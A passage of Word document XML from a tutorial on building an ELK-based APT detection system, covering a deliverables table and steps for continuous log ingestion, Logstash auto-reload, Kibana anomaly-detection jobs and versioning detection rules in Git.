    <w:p w14:paraId="1F50A6BB" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00000000" w:rsidP="00463952">
      <w:r>
        <w:pict w14:anchorId="48886F3B">
          <v:rect id="_x0000_i1113" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74191FE8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✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 6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3693"/>
      </w:tblGrid>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="667CBA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EA0E88" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00463952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683C25A3" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00463952">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="5A6A57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834F9" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>rules/ folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DB52C1D" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Exported JSON of detection rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="677463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78308" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>dashboard.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="672A93C9" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Screenshot of your final APT dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="3D92A5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0620" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>alerts-demo.mp4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55DDEB24" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Short clip showing alerts triggering live</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="7EB8FC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505A1" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>docs/rules-summary.md</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3045BEE4" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>List of all rules with MITRE mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="46555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18BFB" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>docs/validation.csv</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3123D2A8" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Table of test cases, expected vs detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F63B380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🔁</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 7 — Continuous Updates &amp; Maintenance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEA296B" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00000000" w:rsidP="00463952">
      <w:r>
        <w:pict w14:anchorId="43CFB55A">
          <v:rect id="_x0000_i1114" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4843A146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🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Goal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658EC522" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">To make the ELK-based APT detection system </w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>self-sustaining</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312D86DD" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>Automatically ingest new log data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9B9A23" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>Update detection rules when new patterns are found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E74FFFC" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>Allow fine-tuning of configurations (Logstash, Beats, dashboards).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698D6D7E" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:lastRenderedPageBreak/>
        <w:t>Ensure easy retraining or updates without downtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AE59DB" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00000000" w:rsidP="00463952">
      <w:r>
        <w:pict w14:anchorId="126D0A20">
          <v:rect id="_x0000_i1115" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BA13A7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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 7.1 — Why Continuous Updates Matter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2590D97E" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">APT attacks constantly evolve — new tactics, new scripts, new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>behaviors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F478DC" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">If your system doesn’t learn from </w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>fresh benign</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>malicious</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> data, it’ll get outdated fast.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCD71B3" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>So, you’ll set up:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8FE1CD" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Incremental log ingestion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D66664" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rule auto-updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7322D9E6" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Retraining &amp; tuning scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0E4903" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>System monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E13C6B1" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Backup &amp; restore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BA3C89" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00000000" w:rsidP="00463952">
      <w:r>
        <w:pict w14:anchorId="7C2A2B96">
          <v:rect id="_x0000_i1116" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB10B25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⚙️</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 7.2 — Continuous Log Ingestion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590546D5" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>Your Beats (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>Winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t>, Suricata) already send logs in near real-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7B42A7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✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> To make ingestion continuous:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B8E260" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>Keep all Beats configured as services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D15152" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> enable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="39298577" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> enable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="08F1F56F" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> enable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="45615693" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">Set Logstash pipelines to </w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>auto reload</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:br/>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>logstash.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42432888" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>config.reload.automatic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t>: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2576CF29" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>config.reload.interval</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t>: 3s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F624FF" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>This means you can edit pipeline .conf files and Logstash reloads them automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F620F4" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00000000" w:rsidP="00463952">
      <w:r>
        <w:pict w14:anchorId="78D72202">
          <v:rect id="_x0000_i1117" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="475B1412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🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 7.3 — Incremental Model &amp; Rule Updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1DD1CE" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>Although your ELK detection logic is mostly rule-based, you can make it semi-intelligent:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F068873" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Elastic Machine Learning Jobs</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> (built into Kibana → “Machine Learning” tab)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ADA1F4" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>Train models to detect anomalies like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682B0958" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>Sudden increase in failed logins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561270E6" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>New PowerShell command patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C821208" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:lastRenderedPageBreak/>
        <w:t>Unusual outbound network traffic volume</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FA74A7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📊</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575A09E7" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kibana → Machine Learning → Anomaly Detection</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:br/>
        <w:t>Create Job → Choose Index → Select normalized-logs-*</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:br/>
        <w:t xml:space="preserve">Field to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>bytes_out</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:br/>
        <w:t xml:space="preserve">Detector: “High mean value” per </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>source.ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:br/>
        <w:t>→ This detects data exfiltration anomalies automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343AB797" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>Docs:</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔗</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId62" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00463952">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/machine-learning/current/create-and-run-anomaly-detection-jobs.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4BA1D912" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00000000" w:rsidP="00463952">
      <w:r>
        <w:pict w14:anchorId="7040A521">
          <v:rect id="_x0000_i1118" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1170BE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⚡</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 7.4 — Auto Updating Detection Rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071EDD67" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>Elastic allows you to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46206A9F" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Export</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> rules to JSON.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A7240F" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">Keep them in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Git repository</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1F4C88" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>Schedule periodic sync (daily/weekly) with a script that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC7EB9F" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="84"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>Pulls the latest rules.</w:t>
